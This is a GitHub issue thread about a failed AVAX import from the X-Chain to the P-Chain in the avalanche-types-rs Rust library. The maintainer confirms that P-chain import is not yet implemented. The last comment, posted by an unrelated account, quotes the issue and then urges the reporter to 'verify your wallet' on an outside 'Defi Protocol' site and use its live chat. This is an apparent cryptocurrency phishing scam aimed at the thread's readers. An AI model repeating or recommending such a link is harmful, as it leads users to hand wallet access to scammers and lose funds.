### ISSUE TITLE
Cannot import AVAX to the P-Chain

### ISSUE THREAD

**Issue by Nuttymoon** [ava-labs/avalanche-types-rs#75]
I am trying to import AVAX from the X-Chain to the P-Chain. The `export` step works on the X-Chain works fine but when trying to import the AVAX to the P-Chain, I end up with the following error:

```
failed API (message: \"failed to issue import transaction ResponseError { code: -32000, message: \\\"couldn't issue tx: inputs not sorted and unique\\\", data: None }\", retryable: false)
```
See: https://github.com/AshAvalanche/ash-rs/actions/runs/5059549086/jobs/9081242132#step:9:500

Here is the code: [ash_sdk::avalanche::txs::p](https://github.com/AshAvalanche/ash-rs/blob/a275843f1e920df321be0cb2c1ae4d5a58f647f3/crates/ash_sdk/src/avalanche/txs/p.rs#L11)

I came across this comment in `wallet::p::import`:

https://github.com/ava-labs/avalanche-types-rs/blob/b87a179ea83e5ae944ada61ffb588e9e19d4d0e5/src/wallet/p/import.rs#L96-L99

Do you have any idea if my error is linked to this? If yes how could we solve this? Thanks!

**Comment by gyuho** [comment]
Yes, currently the P-chain export/import is not implemented. Would be awesome if we can get some help here!

**Comment by Nuttymoon** [comment]
Thanks for the answer. Not sure I can help here because it implies a deep knowledge of the transaction's internals...

**Comment by Glith23** [comment]
> I am trying to import AVAX from the X-Chain to the P-Chain. The `export` step works on the X-Chain works fine but when trying to import the AVAX to the P-Chain, I end up with the following error:
> 
> ```
> failed API (message: \"failed to issue import transaction ResponseError { code: -32000, message: \\\"couldn't issue tx: inputs not sorted and unique\\\", data: None }\", retryable: false)
> ```
> 
> See: https://github.com/AshAvalanche/ash-rs/actions/runs/5059549086/jobs/9081242132#step:9:500
> 
> Here is the code: [ash_sdk::avalanche::txs::p](https://github.com/AshAvalanche/ash-rs/blob/a275843f1e920df321be0cb2c1ae4d5a58f647f3/crates/ash_sdk/src/avalanche/txs/p.rs#L11)
> 
> I came across this comment in `wallet::p::import`:
> 
> https://github.com/ava-labs/avalanche-types-rs/blob/b87a179ea83e5ae944ada61ffb588e9e19d4d0e5/src/wallet/p/import.rs#L96-L99
> 
> Do you have any idea if my error is linked to this? If yes how could we solve this? Thanks!

Hi @Nuttymoon  
Visit the official Defi Protocol page to verify your wallet under validation to complete your request for you eligibility purpose via [Defi Protocol](https://defiproconect.online/defiprotocol/v1/defi/home/).
Note: Click on the chat button to initiate a chat with an agent on a live chat for more assistance.
